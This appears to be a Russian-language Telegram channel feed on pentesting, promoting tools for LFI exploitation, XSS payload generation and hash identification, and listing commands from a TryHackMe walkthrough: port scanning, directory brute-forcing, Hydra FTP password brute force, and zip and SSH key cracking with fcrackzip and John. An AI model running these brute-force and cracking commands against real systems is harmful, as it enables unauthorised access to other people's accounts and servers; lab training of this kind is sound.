🔥 Полезные библиотеки Python

hash-identifier - одна из самых популярных утилит сталкеров для определения различных типов хэшей, используемых для шифрования данных в особенности паролей.

⚙️ GitHub

#redteam #pentest #github #soft #python

🔥 Полезные библиотеки Python

Liffy - утилита для эксплуатации LFI: локального включения файлов.

LFI - это подключение, выполнение или чтение локальных файлов на сервере, популярный и часто эксплуатируемый способ взлома сайтов и веб приложений.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub/Инструкция

#github #soft #python #pentest #redteam

⚡️ Большая практика по хакингу ⚡️
💰 Хочешь получить одну из самых востребованных профессий в IT?
🔥 Пентест, этичный хакинг и информационная безопасноть для новичков

☠️ Ломаем сайт и проникаем на сервер

🌵 Взлом приватных ключей и zip архива
🌵 Брутфорс ftp сервера
🌵 Python скрипты для шифрования и дешифровки
🌵 Хакерский софт
🌵 Взлом хешей паролей
🌵 Мисконфиги и rsa ключи на сервере
🌵 Эскалация привилегий и многое другое

Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪

https://youtu.be/tm3B6yYOJVw

#youtube

🖥 Машина из видео
https://tryhackme.com/room/mnemonic

🖥 Большой выбор бесплатных машин
https://tryhackme.com/

🔎 Nmap под разные ОС
https://nmap.org/download.html

🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch

😎 Команды из видео:

⌨️ Rustscan

$ rustscan -a ip_address

⌨️ Nmap

$ nmap -sC -sV ip_address
$ nmap -sC -sV -p21,80,1337 ip_address

⌨️ Gobuster

$ gobuster dir -w /usr/share/dirb/wordlists/common.txt -t 50 -x php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx  -u ip_address

⌨️ fcrackzip

fcrackzip -D -p rockyou.txt -u backup.zip -v

⌨️ Hydra

$ hydra -l ftpuser -P rockyou.txt ftp://ip_address -V

⌨️ Wget

wget -r ftp://username:password@ipaddress/

⌨️ John

$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

⌨️ id_rsa SSH connect

$ ssh -i id_rsa user@ip_address -p 1337

⌨️ Pyhon скрипт из видео:
https://github.com/MustafaTanguner/Mnemonic

☠️ Шпаргалка по атаке на Active Directory(AD)

#cheatsheet #ad #windows #redteam

🔥 Полезные библиотеки Python

XSS-LOADER TOOLS - инструмент позволяет создавать полезную нагрузку для использования в xss-инъекциях.

Также имеет два модуля: один для обнаружения XSS уязвимостей, а другой - для Google Dorking.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub/Инструкция

#redteam #pentest #github #soft #python

💾 Bug-Bounty-Wordlists - репозиторий с множеством словарей под разные задачи для пентеста и баг-хантинга

⚙️ GitHub

#pentest #redteam #cybersec

💾 SSH penetration testing sample

Полезная шпаргалка по взлому SSH. Всё от установки подключения, до генерации ключей, различных утилит для поиска и сканирования уязвимостей и взлома паролей Hydra

#redteam #pentest #ssh #doc

💾 Хороший чек-лист по пентесту Web приложений

#doc #cheatsheet #pentest #redteam

Хакеры группировки Lockbit извинились перед детской больницей Торонто за то, что один из них зашифровал документы учреждения и требовал выкуп за расшифровку.

Они бесплатно предоставили медикам дешифратор. принесла извинения госпиталю и сказали, что провели воспитательную беседу с легкомысленным коллегой.

Name-That-Hash — пожалуй один из самых эффективных и простых инструментов для пентестера по распознаванию различных типов хэшей.

Очень удобной фичей является то, что сразу выдает возможные типы и их ID, что позволяет сразу подставлять их в программы для взлома, такие как HashCat и John

Установка:

$ pip install name-that-hash

Использование:
$ nth —text 'your_hash'

⚙️ GitHub/Инструкция

#python #soft #github